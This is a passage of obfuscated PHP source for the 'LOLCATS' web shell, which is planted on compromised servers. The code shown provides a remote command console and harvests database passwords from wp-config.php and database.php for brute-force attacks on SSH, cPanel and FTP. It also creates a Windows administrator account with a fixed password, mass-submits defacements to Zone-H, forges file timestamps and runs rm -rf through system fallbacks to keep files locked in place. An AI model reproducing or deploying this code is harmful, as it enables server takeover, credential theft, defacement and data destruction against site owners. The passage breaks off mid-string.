XcvSP: if ($_1337["action"] == "rename") { s(); echo "\xa\x9 <div class='btn-group'>\xa \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified&opn={$file}'><i class='bi bi-calendar-date'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod&opn={$file}'><i class='bi bi-file-earmark-medical'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa</div><br><i class='bi bi-file-earmark'></i>: " . basename($file) . "</br>\xa\x9 <form method='POST'>\xa\x9\x9\x9<div class='input-group'>
\x9\x9 \x9<input class='form-control btn-sm' type='text' name='new_name' value='" . basename($file) . "' {$_r}>
\x9<button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-emoji-smile-upside-down'></i></button>
\x9\x9</div>
\x9</form>"; } goto L2Ix3; yAMz0: $wget = exe("wget --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto I3jr4; zKCFG: if ($_1337["id"] == "conf") { s(); echo "<center class="anu">Config Password Find & Viewer</center>
<div class="form-group">"; function findPhpFilesWithMysqliConnect($directories) { $result = array(); foreach ($directories as $directory) { $directory = realpath($directory); if ($directory && is_dir($directory)) { $phpFiles = findAllPhpFiles($directory); foreach ($phpFiles as $file) { $contents = file_get_contents($file); if (strpos($contents, "mysqli_connect") !== false && strpos($contents, "localhost") !== false) { $result[] = $file; } } } } return $result; } function findAllPhpFiles($directory) { $result = array(); $items = scandir($directory); foreach ($items as $item) { if ($item == "." || $item == "..") { continue; } $itemPath = $directory . DIRECTORY_SEPARATOR . $item; if (is_dir($itemPath)) { $result = array_merge($result, findAllPhpFiles($itemPath)); } else { if (pathinfo($item, PATHINFO_EXTENSION) === "php") { $result[] = $itemPath; } } } return $result; } function getUserHomePath() { $userId = posix_geteuid(); $userInfo = posix_getpwuid($userId); $userName = $userInfo["name"]; return "/home/{$userName}/"; } function findFiles($directories, $filename) { $result = array(); foreach ($directories as $directory) { $directory = realpath($directory); if ($directory && is_dir($directory)) { $result = array_merge($result, findFilesInDirectory($directory, $filename)); } } return $result; } function findFilesInDirectory($directory, $filename) { $result = array(); $items = scandir($directory); foreach ($items as $item) { if ($item == "." || $item == "..") { continue; } $itemPath = $directory . DIRECTORY_SEPARATOR . $item; if (is_dir($itemPath)) { $result = array_merge($result, findFilesInDirectory($itemPath, $filename)); } else { if (basename($item) === $filename) { $result[] = $itemPath; } } } return $result; } function extractPassword($filePath) { $contents = file_get_contents($filePath); if (preg_match("/'password'\s*=>\s*'([^']+)'/", $contents, $matches)) { return $matches[1]; } if (preg_match("/\['password'\]\s*=\s*'([^']+)'/", $contents, $matches)) { return $matches[1]; } if (preg_match("/'password'\s*=>\s*"([^"]+)"/", $contents, $matches)) { return $matches[1]; } if (preg_match("/"password"\s*=>\s*'([^']+)'/", $contents, $matches)) { return $matches[1]; } if (preg_match("/"password"\s*=\s*"([^"]+)"/", $contents, $matches)) { return $matches[1]; } if (preg_match("/'password'\s*=\s*'([^']+)'/", $contents, $matches)) { return $matches[1]; } if (preg_match("/"password"\s*=\s*'([^']+)'/", $contents, $matches)) { return $matches[1]; } if (preg_match("/password\s*=\s*'([^']+)'/", $contents, $matches)) { return $matches[1]; } if (preg_match("/password\s*=\s*"([^"]+)"/", $contents, $matches)) { return $matches[1]; } if (preg_match("/'DB_PASSWORD'\s*=\s*'([^']+)'/", $contents, $matches)) { return $matches[1]; } return null; } function extractDbPassword($filePath) { $contents = file_get_contents($filePath); if (preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'\s*\)/", $contents, $matches)) { return $matches[1]; } return null; } $homePath = getUserHomePath(); echo "<div class="card card-body text-dark input-group mb-3">\xa <form method="POST">
<i class="bi bi-folder"></i> Directory:\xa <input class="form-control btn-sm text-dark" type="text" name="directories" placeholder="" . htmlspecialchars($homePath) . "">
<div class="form-check">
<input class="form-check-input" type="radio" name="search_option" value="config" checked>
<label class="form-check-label" for="config">Find and view config file passwords */config/database.php & wp-config.php</label>\xa </div>
<div class="form-check">\xa <input class="form-check-input" type="radio" name="search_option" value="mysqli_connect">
<label class="form-check-label" for="mysqli_connect">Find config passwords in all PHP files that contain the word mysqli_connect & localhost</label>\xa </div>\xa <div class="d-grid gap-2">\xa <input class="btn btn-dark btn-sm" type="submit" name="change" value="Submit!">\xa </div>\xa </form>\xa </div>"; if ($_SERVER["REQUEST_METHOD"] === "POST") { $directoriesInput = $_POST["directories"]; $directories = array_map("trim", explode(",", $directoriesInput)); $searchOption = $_POST["search_option"]; $passwords = ''; if ($searchOption === "config") { $filenameDatabase = "database.php"; $filenameWpConfig = "wp-config.php"; $filesDatabase = findFiles($directories, $filenameDatabase); $filesWpConfig = findFiles($directories, $filenameWpConfig); foreach ($filesDatabase as $file) { $password = extractPassword($file); if ($password !== null) { $passwords .= htmlspecialchars($file . ": " . $password) . "
"; } } foreach ($filesWpConfig as $file) { $dbPassword = extractDbPassword($file); if ($dbPassword !== null) { $passwords .= htmlspecialchars($file . ": " . $dbPassword) . "\xa"; } } } elseif ($searchOption === "mysqli_connect") { $filesWithMysqliConnect = findPhpFilesWithMysqliConnect($directories); foreach ($filesWithMysqliConnect as $file) { $passwords .= htmlspecialchars($file . " contains mysqli_connect") . "
"; } } if (!empty($passwords)) { echo "<textarea class='form-control btn-sm text-dark' rows='7' readonly>" . $passwords . "</textarea>"; echo "<p class='text-center'>Use database passwords as wordlists to perform bruteforce SSH, CPanel, FTP attacks etc.</p></div></div>"; } } } goto McR26; McR26: if ($_1337["id"] == "zoneh") { s(); echo "<center class="anu">Zone-H Mass Notify</center>"; echo "<div class='card card-body text-dark input-group mb-3'>"; if ($_POST["submit"]) { $domain = explode("\xd\xa", $_POST["url"]); $nick = $_POST["nick"]; echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier={$nick}/published=0' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}/published=0</a><br>"; echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier={$nick}' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}</a><br><br>"; function zoneh($url, $nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer={$nick}&domain1={$url}&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach ($domain as $url) { $zoneh = zoneh($url, $nick); if (preg_match("/color="red">OK<\/font><\/li>/i", $zoneh)) { echo "{$url} -> OK<br>"; } else { echo "{$url} -> ERROR!<br>"; } } } else { echo "<form method="post">\xa <i class="bi bi-person"></i> Attacker Name:
<input type="text" class="form-control btn-sm text-dark" name="nick" size="50" placeholder="Lolcats" id="nick">
<i class="bi bi-globe2"></i> Domain List: \xa <textarea class="form-control btn-sm text-dark" rows="7" name="url" placeholder="https://piranha.go.id/o.txt" style="resize: vertical;" id="url"></textarea>\xa <div class="d-grid gap-2">\xa <input class="btn btn-dark btn-sm" type="submit" name="submit" value="Submit!">
</div>
</form>"; } echo "</div></div>"; } goto HKnrr; hJVd9: echo "\xa<html>\xa <head>
<meta charset='utf-8'>\xa\x9 <meta name='author' content='LOLCATS'>\xa \x9<!--<meta name='viewport' content='width=device-width, initial-scale=0.40'>-->
<meta name='viewport' content='width=device-width,initial-scale=1,minimum-scale=1'>\xa\x9\x9<meta name='robots' content='noindex, nofollow, noarchive'>
\x9 <link rel='icon' href='https://pic.onlinewebfonts.com/thumbnails/icons_56576.svg'>\xa <title>LOLCATS</title>\xa\x9 <script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>
\x9\x9<script src='//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>
\x9\x9<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<script>function copyToClipboard() {var code = document.getElementById('code').innerText;navigator.clipboard.writeText(code).then(function() {alert('Code copied to clipboard!');}, function(err) {console.error('Failed to copy: ', err);});}</script>
\x9<style>@import url('//cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css');\xa@import url('//cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css');\xa@import url('//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/themes/prism-okaidia.css');\xa@import url('https://fonts.googleapis.com/css2?family=Ubuntu+Condensed');\xa@import url('https://fonts.googleapis.com/css2?family=Sedgwick+Ave&display=swap');
body {
cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important;\xa font-family: 'Ubuntu Condensed';
}
.copy-button {\xa position: absolute;\xa top: 10px;
right: 10px;\xa}\xa.shell {
\x9border-radius: 4px;\xa\x9border: 1px solid rgba(255, 255, 255, 0.4);\xa\x9font-size: 10pt;
display: flex;
\x9flex-direction: column;
\x9align-items: stretch;
\x9background: #242424;\xa color: #fff;
}
\xa.pre {\xa height: 150px;\xa overflow: auto;
white-space: pre-wrap;\xa\x9flex-grow: 1;\xa margin: 10px auto;\xa\x9padding: 10px;\xa\x9line-height: 1.3em;
overflow-x: scroll;
}\xa\xa.anu,
kbd {\xa font-family: 'Sedgwick Ave', cursive;\xa}\xa
.corner {
text-align: right;\xa margin-top: -10px;\xa font-size: 12px;
}\xa
gr {
\x9color: lime;
}
\xaih {
\x9color: white;
}\xare {\xa color: gray;\xa}\xard {\xa color: red;\xa}
.center {\xa text-align: center;\xa}\xa
.center table {\xa margin: 1em auto;
\x9text-align: left;\xa}
.center th {\xa\x9text-align: center !important;\xa}\xa\xa.php_info td,
th {\xa border: 1px solid #666;
\x9font-size: 75%;
\x9vertical-align: baseline;\xa\x9padding: 4px 5px;
}
\xa.p {
\x9text-align: left;
}
\xa.e {\xa\x9background-color: #ccf;\xa width: 300px;
font-weight: bold;
}
\xa.h {
\x9background-color: #99c;
font-weight: bold;
}\xa
.v {
background-color: #ddd;\xa max-width: 300px;
overflow-x: auto;\xa word-wrap: break-word;
}
\xa.v i {
\x9color: #999;\xa}\xa
img {\xa float: right;\xa\x9border: 0;
}
\xahr {
\x9width: 934px;\xa background-color: #ccc;
\x9border: 0;
height: 1px;
}
h1 {
font-size: 150%;\xa}
\xah2 {
\x9font-size: 125%;
}
\xa</style>\xa\x9</head>\xa<body class='bg-dark text-light'>
<div class='box shadow bg-dark p-4 rounded-3'>\xa<a class='text-decoration-none text-light anu' href='" . $_SERVER["PHP_SELF"] . "'><h1>L" . "O" . "LC" . "A" . "TS</h1></a>"; goto T0K_d; O80k0: function exe_root($set, $sad) { $x = "preg_match"; $xx = "2>&1"; if (!$x("/" . $xx . "/i", $set)) { $set = $set . " " . $xx; } $a = "function_exists"; $b = "proc_open"; $c = "htmlspecialchars"; $d = "stream_get_contents"; if ($a($b)) { $ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink, $sad); return $d($pink[1]); } else { return "proc_open function is disabled!"; } } goto n2Jfp; Nd1vW: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<i class='bi bi-hdd-rack'></i> : <a class='text-decoration-none text-light' href='?path=/'>/</a>"; continue; } if ($pat == '') { continue; } echo "<a class='text-decoration-none text-light' href='?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "'>" . $pat . "</a>/"; } goto qpHXb; lI5Xj: $gcc = exe("gcc --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto uqK5Y; brEKJ: if (isset($_1337["filenew"])) { s(); if (isset($_1337["bikin"])) { $name = $_1337["name_file"]; $contents_file = $_1337["contents_file"]; $files = $_FILES["file_upload"]; $path = isset($_1337["path"]) ? $_1337["path"] : ''; foreach ($name as $index => $name_file) { $handle = @fopen($name_file, "w"); $create = false; if ($contents_file && strlen($contents_file) > 0) { $create = @fwrite($handle, $contents_file); } else { if (isset($files["tmp_name"][$index]) && $files["size"][$index] > 0) { $create = move_uploaded_file($files["tmp_name"][$index], $name_file); } else { $file_contents = file_get_contents($files["tmp_name"][$index]); $create = file_put_contents($name_file, $file_contents); if (!$create) { $create = copy($files["tmp_name"][$index], $name_file); } } } fclose($handle); } if ($create) { echo "<strong>Create file</strong> OK! " . ok() . "</div>"; } else { echo "<strong>Create file</strong> FAIL! " . er() . "</div>"; } } echo "\xa\x9\x9<div class='mb-3'>
\x9\x9 <form method='POST'>\xa\x9 \x9<i class='bi bi-file-earmark'></i> Filename:
\x9 \x9<input class='form-control form-control-sm text-dark' type='text' name='name_file[]' placeholder='lolcats.txt' {$_r}>
\x9 \x9 <i class='bi bi-code-square'></i> Your Script:\xa\x9 \x9 <textarea class='form-control form-control-sm text-dark' name='contents_file' rows='7' placeholder='Hacked by Lolcats' {$_r}></textarea>
\x9\x9\x9 <div class='d-grid gap-2'><br>
\x9\x9 <input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='Submit!'>
\x9\x9 \x9</div>\xa\x9 \x9</form>
</div>"; } goto HWVuk; S3aat: $py = exe("python --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto lI5Xj; x7c3H: @ini_set("display_errors", 0); goto sS0QO; n2Jfp: function p($file) { $p = fileperms($file); if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto HBdOH; uWBu2: $scdir = explode("/", $dir); goto R4x76; pJlC5: if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto EfyhR; B7bX7: $gcw = "getcwd"; goto e7iUg; mThJN: echo "<div class='container-fluid'>\xa <div class='corner'>
<i data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'>Information Server</i>\xa </div><br>
<div class='collapse text-dark mb-3' id='collapseExample'>\xa <div class='box shadow bg-light p-3 rounded-3'>System: " . php_uname() . "<br>
Software: " . $_SERVER["SERVER_SOFTWARE"] . "<br>
PHP Version: " . PHP_VERSION . " PHP Os: " . PHP_OS . "<br>
Server IP: " . gethostbyname($_SERVER["HTTP_HOST"]) . "<br>\xa Your IP: " . ia() . "<br>
User: {$user} [{$uid}] | Group: [{$group}] [{$gid}]<br>
Safe Mode: {$sm}<br>
MYSQL: {$sql} | PERL: {$pl} | PYTHON: {$py} | WGET: {$wget} | CURL: {$curl} | GCC: {$gcc} | PKEXEC: {$pkexec}<br>\xa Disable Function:<br><pre>{$disfc}</pre>
</div>\xa </div>
\x9\x9</div>
\x9 <div class='text-center'>
\x9\x9 <div class='btn-group'>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=backcon'><i class='bi bi-hdd-network'></i> Back Connect </a>\xa \x9 \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Command </a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=conf'><i class='bi bi-hdd'></i> Config Password </a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=masschemod'><i class='bi bi-file-earmark-medical'></i> Chmod All [F/D] </a>
\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=rdp'><i class='bi bi-intersect'></i> Create RDP </a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=cpanel'><i class='bi bi-gear'></i> cPanel Tools</a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=findmtime'><i class='bi bi-files'></i> Find Modified Time </a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=findkey'><i class='bi bi-file-earmark-break'></i> Find File </a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=getpriv'><i class='bi bi-code-square'></i> Get Private Tools </a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=jumping'><i class='bi bi-door-open'></i> Jumping </a>
\x9 \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=lockfile'><i class='bi bi-file-earmark-lock'></i> Lock File </a>
<!--<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=lokit'><i class='bi bi-lock'></i> Lock Shell </a>-->
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=deface'><i class='bi bi-exclamation-diamond'></i> Mass Deface</a>\xa\x9 \x9<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass Delete </a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=chmod'><i class='bi bi-file-earmark-medical'></i> Mass Chmod</a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=pwnkit'><i class='bi bi-bug'></i> PwnKit </a>\xa\x9 \x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=portscan'><i class='bi bi-hdd'></i> Port Scan </a>
\x9\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload </a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&id=zoneh'><i class='bi bi-file-text'></i> Zone-H </a><br> \xa \x9 </div>\xa\x9 </div>"; goto m1iO2; x5qzN: if ($_1337["action"] == "view") { s(); echo "<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified&opn={$file}'><i class='bi bi-calendar-date'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod&opn={$file}'><i class='bi bi-file-earmark-medical'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>
</div>
\x9<br><i class='bi bi-file-earmark'></i>: " . basename($file) . "
</br>
<div class='bg-dark'>\xa\x9\x9\x9<div class='container-fluid language-javascript'>\xa \x9\x9\x9<textarea rows='10' class='form-control' disabled=''>" . htmlspecialchars(file_get_contents($file)) . "</textarea>
\x9\x9</div>
\x9 </div>"; } goto S0ump; nShOo: if ($_1337["id"] == "cmd") { s(); echo "<center class="anu">Command (Use Many Functions!)</center>"; if (!empty($_POST["cmd"])) { $cmd = exe($_POST["cmd"]); } echo "<div class='mb-3'>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control btn-sm text-dark' type='text' name='cmd' value='" . htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8") . "' placeholder='whoami' {$_r}>\xa <button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-emoji-smile-upside-down'></i></button>
</div>
</form>"; if (isset($cmd)) { echo "<div class="container-fluid language-javascript">\xa <div class="shell mb-3">
<pre style="font-size:10px;">$ <rd>" . htmlspecialchars($_POST["cmd"], ENT_QUOTES, "UTF-8") . "</rd><br><code>" . htmlspecialchars($cmd, ENT_QUOTES, "UTF-8") . "</code></pre>
</div>\xa </div>"; } elseif ($_SERVER["REQUEST_METHOD"] == "POST") { echo "\xa <div class="container-fluid language-javascript">
<div class="shell mb-3">\xa <pre style="font-size:10px;"><code>No result</code></pre>
</div>\xa </div>
</div>"; } } goto FP6mR; xqoVY: if ($_1337["id"] == "findkey") { s(); echo "<div class="container-fluid">
<center class="anu">Find File Using Keyword</center>\xa <div class="card card-body text-dark input-group mb-3">
<div class="container-fluid mt-1">
<form method="post">\xa <div class="form-group">\xa <i class="bi bi-folder"></i> <label for="path"> Directory: </label>
<input type="text" name="path" class="form-control form-control-sm text-dark flex-grow-1" value="" . $dir . "/">\xa </div>\xa <i class="bi bi-search"></i> <label for="keyword"> Keyword: </label>
<input type="text" name="keyword" class="form-control form-control-sm text-dark flex-grow-1" placeholder="eval, phpinfo etc." required>\xa\xa <div class="input-group">\xa <i class="bi bi-file-earmark"></i> <label for="extension"> Extension: </label>\xa <div class="form-check">\xa <input class="form-check-input" type="radio" name="extension" id=".php" value=".php" checked>
<label class="form-check-label" for=".php"> php </label>
</div>
<div class="form-check">\xa <input class="form-check-input" type="radio" name="extension" id=".html" value=".html">
<label class="form-check-label" for=".html"> html </label>\xa </div>\xa <div class="form-check">\xa <input class="form-check-input" type="radio" name="extension" id=".txt" value=".txt">
<label class="form-check-label" for=".txt"> txt </label>\xa </div>\xa <div class="form-check">\xa <input class="form-check-input" type="radio" name="extension" id="all" value="all">
<label class="form-check-label" for="all"> All </label>
</div>\xa </div>\xa <div class="d-grid gap-2">\xa <input class="btn btn-dark btn-sm" type="submit" name="custom_extension" value="Submit!">\xa </div>\xa </form>\xa </div>\xa </div>"; if ($_SERVER["REQUEST_METHOD"] == "POST") { $keyword = $_POST["keyword"]; $path = isset($_POST["path"]) ? $_POST["path"] : "."; $extension = $_POST["extension"]; if ($extension === "all") { $files = glob("{$path}/*"); } else { $files = glob("{$path}/*{$extension}"); } $matching_files = array(); foreach ($files as $file) { if (is_file($file) && strpos(file_get_contents($file), $keyword) !== false) { $matching_files[] = $file; } } if (!empty($matching_files)) { echo "<div class="card card-body text-dark">Searching " . $keyword . " on " . $extension . " extension.<ul>"; foreach ($matching_files as $matching_file) { echo "<li>" . $matching_file . "</li>"; } echo "</ul></div>"; } else { echo "<p>No matching files found.</p>"; } } } goto huGM_; YFNC7: if ($_1337["action"] == "changemodified") { s(); function changeDate($itemPath, $newDate) { if (is_file($itemPath) || is_dir($itemPath)) { if (touch($itemPath, strtotime($newDate))) { return true; } else { return false; } } return false; } $currentTime = microtime(true); $microseconds = sprintf("%06d", ($currentTime - floor($currentTime)) * 1000000); $dateTimeWithMicroseconds = date("Y-m-d H:i:s.", $currentTime) . $microseconds; $itemToChangeDate = $_GET["opn"]; $itemPathToChangeDate = $path . "/" . $itemToChangeDate; echo "<div class='btn-group'>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified&opn={$file}'><i class='bi bi-calendar-date'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod&opn={$file}'><i class='bi bi-file-earmark-medical'></i></a>\xa<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa</div>\xa<br><i class='bi " . (is_dir($itemPathToChangeDate) ? "bi-folder" : "bi-file-earmark") . "'></i>: " . basename($itemPathToChangeDate) . "</br>
<form method='POST'><div class='input-group'><input class='form-control btn-sm' type='text' name='new_date' value='" . $dateTimeWithMicroseconds . "' {$_r}>
<button class='btn btn-outline-light btn-sm' type='sumbit' name='changemodified'><i class='bi bi-emoji-smile-upside-down'></i></button>\xa</div>\xa</form>"; if (isset($_POST["changemodified"])) { $newDate = $_POST["new_date"]; if (changeDate($itemPathToChangeDate, $newDate)) { echo "<strong>Change Date</strong> OK! " . ok() . "</div>"; } else { echo "<strong>Change Date</strong> FAIL! " . er() . "</div>"; } } } goto O0lrs; SZTWR: error_reporting(0); goto LZ0AL; MxyOS: if ($_1337["action"] == "delete_folder") { s(); if ($_1337["yeah"]) { if (is_dir($dir)) { if (is_writable($dir)) { if (deleteDir($dir)) { echo "<strong>Delete folder</strong> OK! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Delete folder</strong> FAIL! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } else { echo "<strong>Delete folder</strong> FAIL! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } } echo "<div class='btn-group mb-3'>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified_folder'><i class='bi bi-calendar-date'></i></a>
<!--<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod'><i class='bi bi-file-earmark-medical'></i></a>-->
<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
</div><div class='card card-body text-dark input-group mb-3'>\xa \x9\x9<p>Are you sure to delete : " . basename($dir) . " ?</p>
\x9 \x9<form method='POST'>
\x9\x9 <a class='btn btn-dark btn-block btn-sm' href='?dir=" . dirname($dir) . "'>No</a>
\x9 \x9<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>
\x9 \x9</form>
\x9</div>"; } goto brEKJ; R4x76: for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } if ($_1337["id"] == "rdp") { ob_implicit_flush(); ob_end_flush(); if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { echo "<center class="anu">Create RDP (Windows Server)</center>"; echo "\xa <div class="container-fluid language-javascript">
\x9\x9 <div class="shell mb-3">
\x9 <pre style="font-size:10px;"><code>" . exe_root("net user DataAdmin Monochrx#37 /add", $path) . exe_root("net localgroup administrators DataAdmin /add", $path) . "<br>If there is no "Access is denied." output, chances are that you have succeeded in creating a user here. Just log in using the username and password below.<br>hosts: <gr>" . gethostbyname($_SERVER["HTTP_HOST"]) . "username: DataAdmin
password: Monochrx#37</code></pre></div></div>"; } else { echo "<script>alert('Whutt?! kids, this tool only works for windows server!');</script>"; } } $resoolt = "lolcats.txt"; if ($_1337["id"] == "lockfile") { s(); echo "<center class="anu">Lock File</center>
<div class="card card-body text-dark input-group mb-3">\xa <div class="container-fluid mt-1">\xa <form method="post" action="">\xa <div class="mb-3">
<input type="text" name="lockfile" class="form-control form-control-sm text-dark flex-grow-1" placeholder="" . $resoolt . "" required>\xa </div>
<div class="d-grid gap-2">
<input class="btn btn-dark btn-sm" type="submit" value="Submit!">\xa </div>
</form>
</div></div><p class="text-center">To prevent files from being modified, destroyed, or altered, use a lock file. To run this, an execute command is needed.</p>"; function remdot($filename) { return str_replace(".", '', $filename); } function get_temp_dir() { $tmp_paths = array("/tmp", "/var/tmp"); foreach ($tmp_paths as $tmp_path) { if (is_writable($tmp_path)) { return $tmp_path; } } if (function_exists("sys_get_temp_dir")) { return sys_get_temp_dir(); } if (!empty($_ENV["TMP"])) { return realpath($_ENV["TMP"]); } elseif (!empty($_ENV["TMPDIR"])) { return realpath($_ENV["TMPDIR"]); } elseif (!empty($_ENV["TEMP"])) { return realpath($_ENV["TEMP"]); } $tempfile = tempnam(sys_get_temp_dir(), ''); if ($tempfile) { unlink($tempfile); return realpath(dirname($tempfile)); } return false; } function cmdoitlock($command) { if (function_exists("system")) { system($command); } elseif (function_exists("exec")) { exec($command); } elseif (function_exists("shell_exec")) { shell_exec($command); } elseif (function_exists("passthru")) { passthru($command); } elseif (function_exists("popen")) { $handle = popen($command, "r"); if ($handle) { while (!feof($handle)) { echo fgets($handle, 4096); } pclose($handle); } } elseif (function_exists("proc_open")) { proc_open($command, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")), $pipes); } elseif (function_exists("`")) { echo `{$command}`; } } if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["lockfile"])) { $namafilelos = $_POST["lockfile"]; $tmpnya = get_temp_dir(); if ($tmpnya) { $cachedirectorylo = $tmpnya . "/.PHPSESSID"; if (file_exists($cachedirectorylo . "/." . base64_encode(getcwd() . remdot($namafilelos) . "-handler")) && file_exists($cachedirectorylo . "/." . remdot($namafilelos) . "-text")) { cmdoitlock("rm -rf " . $cachedirectorylo . "/." . base64_encode(getcwd() . remdot($namafilelos) . "-text-file")); cmdoitlock("rm -rf " . $cachedirectorylo . "/." . base64_encode(getcwd() . remdot($namafilelos) . "-handler")); } mkdir($cachedirectorylo); cmdoitlock("cp {$namafilelos} {$cachedirectorylo}/." . base64_encode(getcwd() . remdot($namafilelos) . "-text-file")); chmod($namafilelos, 292); $handler = "<?php
